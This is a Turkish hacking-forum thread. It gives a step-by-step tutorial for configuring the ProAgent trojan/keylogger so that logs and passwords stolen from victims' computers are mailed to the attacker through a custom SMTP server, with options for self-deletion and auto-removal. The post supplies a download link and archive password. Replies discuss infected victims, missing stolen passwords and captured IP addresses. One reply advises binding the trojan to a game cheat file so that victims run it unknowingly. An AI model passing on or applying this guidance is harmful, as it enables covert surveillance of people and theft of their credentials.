ProAgent'ta mail Problemine SON !! "Gelişmiş Ayarlar"la artık Hiçbir sorun Kalmayacak

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

TuRK_HaRD

нα¢кιηg αяαşтıямα¢ıѕı
Reaction score
0
ProAgent'ta mail Problemine SON !! "Gelişmiş Ayarlar"la artık Hiçbir sorun Kalmayacak

((ProAgent Detaylı Anlatımı İçin TIKLAYIN!))

Trojan ve keylogger/stealer'larımızı yenilemeye, sorunları gidermeye devam ediyoruz!

Pek fazla kullanıcı tarafından bilinmeyen proagent gelişmiş ayarları ile mail problemini ortadan kaldırıyoruz artık..

Döküman tamamen tarafıma, yani TuRK_HaRD'a aittir bu arada..;)

İhtiyacımız bir tek Gmail mail adresi

Resimli anlatıma başlayalım.. İlk olarak programımızı açalım (Download linki aşağıda..)

ve "Select Language"den dilini "Türkçe"ye çevirelim ki daha anlaşılır olsun:

proagent_1.jpg

Ardından "Gelişmiş Ayarlar" menüsünden "Ayarlar"a tıklayalım:

proagent_2.jpg

Önemli kısım burası.. Alttaki resimdeki gibi "Benim smtp Serverımı kullan" ve

"Farklı bir smtp protu kullan" kısımlarına tik atalım.. Ve smtp server adresimizi ve portunu girelim:

proagent_3.jpg

İstersek yine bu ayar sayfasında "Mail Gönderme" bölümünde,

kurbanın bilgisayarından kayıtların bir kere gönderilmesini, ardından server'ın silinmesini ayarlayabiliriz..

Yine server için bir kaldırılma tarihi belirleyebilirsiniz ("Otomatik Kaldırma" bölümünden)

Gmail'in "SPAM" klasörüne bakıyoruz.. ve işte test maili gelmiş;)

proagent_gmail.jpg

Böylece artık "Proagent'tan mail alamıyorum", "Test mesajı bile gelmiyor",

"Mail servisi çalışmyor" yakınmalarından kurtulmuş oluyoruz..

ProAgent v2.1 SE Download = http://rapidshare.com/files/39457145/ProAgent-v2.1.9-S.E__by_TuRK_HaRD.rar

rar şifresi = turk_hard

kolay gelsin, iyi çalışmalar herkese..;)

(BU DÖKÜMAN TAMAMEN TARAFIMA (TuRK_HaRD'a) AİT OLUP LÜTFEN İZİNSİZ KOPYALAMAYINIZ..)

Beğendiğiniz paylaşımlarda
TEŞEKKÜR BUTONU'nu kullanmayı unutmayın..

BİŞ Sorcam Hala ÇaliŞiyormu Bu Proagent ? EĞer ÇaliŞiyorsa Var Ya SÜper BİŞİ Bİde Pro Yazan Bİr Rar Vardi Pİyasada Şİrelerİ Olan O SÜrÜmde ÇaliŞiyormu Turkhard

suphi30' Alıntı:
BİŞ Sorcam Hala ÇaliŞiyormu Bu Proagent ? EĞer ÇaliŞiyorsa Var Ya SÜper BİŞİ Bİde Pro Yazan Bİr Rar Vardi Pİyasada Şİrelerİ Olan O SÜrÜmde ÇaliŞiyormu Turkhard

zipşifrsi pro olan prorat olması lazım :goz:

sağolasın usta aynen dediklerini yaptım çalıştı.

Benim ''smtp serverimi'' ve '' Farklı bir smtp portunu'' nasıl girmem ferekiyo.
Şimdiden tşk ler...

Benim '' smtp serverımı'' ve '' farklı bir smtp portunu'' nasıl girmem gerekiyo....
Şimdiden tşk ler....

Bana test mail i gelmiyo....
Gailba smtp serverimi ve smtp portunu yanlış giriyorum...

Usta bunda şifreler gelmiyor e-maile.

gelen e-mailde komple bu şekilde geldi.

bir aralar ares abimiz vardı.. kulakları çınlasın.. yerini sen alacaksın galiba.. ellerine sağlık.. teşekkürler..

gkhnd' Alıntı:
Usta bunda şifreler gelmiyor e-maile.

gelen e-mailde komple bu şekilde geldi.

birdaha gelen logları yayınlamayın.

Çıkmamasının sebebi; pc de msn otomatik oturum açta olmadığından olabilir.
Serverin 2. maili göndermesini bekleyin. daha ayrıntılı gelecektir.

Uyarıyı aldım Tamam tşk.ler. Ben şimdi buldum adamın pc de deepfreeze varmış dfrserv.exe aç kapa yapmış silinmiş sanırım.

Hocam birde şimdi karşı taraf bu exe yi yedi. ben pc yi kapatsam dahi bana e-mail log reportları gelirmi ?

Şu an kapatıp açtım ProAgenti Benim Download etmeleri için yükledigim server.exe ler;Bende Proagent kapalı kalsa dahi çalışıp e-mail gelirmi ?

Şu an kapatıp açtıgımda server oluştur bölümü ilk ayarlarında görünüyor.Yeniden servermi oluşturup yedirmem gerekiyor acaba? Yani her açıp kapayınca servermi oluturmam lazım yoksa gerek yok çalışıyormu?

Yardımınız için Şimdiden teşekkürler.

sen serveri olusturdugun zamna artık o senden tamemen bagımsız bi işlev olarak calışır tek görevi vardır ona kim tıklarsa sana mail gelir yani sen pro yu kapatman veya acman serverı etkılemez serverı olustururken yaptıgının ayarların yapmısındır iş orda bitti nasıl bi server olusturmussan ona tıklayan kısı aynı sekıl bilgilerini alabilirsin...

Süper anlatımlar süper programlar.

Peki hocam server.exe olarak server oluşturuyor bu program.Bunun ismini üzerine gelip sağ tıkla değiştirirsek özelliği bozulurmu?

Valla ne diyim Benim gibi bir acemi bile sizlerin yardımıyla böyle bişi yapabiliyorsa :D
Teşekkür ederim yardımlarınız için.

ip adresini dogru olarak gönderiyormu yoksa yerel ip adreslerinimi gönderiyor?

serverin adını değiştirince hiçbir bozulma olmaz sen severi bi dosya ile birleştirip adını orn: koxp ve ya oyun diye koyabilirsin mesala 1482 koxp buldun trojen olusturdugun dosya ile birleştircegin zaman o koxp la birleştir koxp'a tıklayanca kişi aynı zamanda trojenede tıklamıs olur..

ip adresine gelince sadece istemci ip adresini veriyor...

gmail ile nasıl ayar oluyor bana gelmedi mail de kullandığım smtp bunlar;

gsmtp163.google.com
gsmtp183.google.com
gmail.smtp.in.l.google.com
alt1.gmail.smtp.in.l.google.com
alt2.gmail.smtp.in.l.google.com

madartemis' Alıntı:
ip adresini dogru olarak gönderiyormu yoksa yerel ip adreslerinimi gönderiyor?

örneğin ADSL'ler için 88... ile başlayan gerçek IP adresini veriyor.

Metaphor' Alıntı:
gmail ile nasıl ayar oluyor bana gelmedi mail de kullandığım smtp bunlar;

gsmtp163.google.com
gsmtp183.google.com
gmail.smtp.in.l.google.com
alt1.gmail.smtp.in.l.google.com
alt2.gmail.smtp.in.l.google.com

gmail'in smtp serverlarında bir sorun var, veya hotmail gibi o da smtp serverlarını kapatıyor..

ben önceden paylaştığım programlarda hep gmail öneriridim ama artık yollamıyor..

bu yüzden sorunsuz çalışması için yahoo'yu verdim..

windos belirlenen aygıta yola yada dosyaya erişemedi . ögeye erişmek için gerekli izininiz olmaya bilir diye uyarı cıkyor ve exe dosyası acılmıyor? neden
??? ... .

ben bu proratı rar'dan çıkardım öğeye erişmek için gereken izniniz olmayabilir diyo ne yapmalıyım yardım pls :vur

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
Geri